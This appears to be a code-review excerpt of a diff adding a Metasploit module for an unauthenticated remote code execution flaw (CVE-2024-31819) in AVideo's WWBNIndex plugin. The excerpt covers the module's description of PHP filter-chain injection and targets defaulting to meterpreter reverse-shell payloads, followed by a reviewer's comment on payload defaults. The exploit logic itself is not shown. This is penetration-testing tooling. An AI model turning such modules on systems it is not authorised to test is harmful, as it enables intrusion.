modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb

```diff
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::PhpFilterChain
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution (RCE) vulnerability
+          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the
+          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`
+          function without proper sanitization. By exploiting this, an attacker can leverage the
+          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows
+          for the execution of commands and control over the affected system. The exploit is
+          particularly dangerous because it does not require authentication, making it possible
+          for any remote attacker to exploit this vulnerability.
+        },
+        'Author' => [
+          'Valentin Lobstein'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-31819'],
+          ['URL', 'https://github.com/WWBN/AVideo'],
+          ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']
+        ],
+        'Platform' => ['php', 'unix', 'linux', 'win'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
+              'Type' => :php_memory
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },
```

Comment:
It shouldn't be necessary to set the PAYLOAD in the default options but if you do, we'd recommend using an unstaged variant.
```suggestion
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
```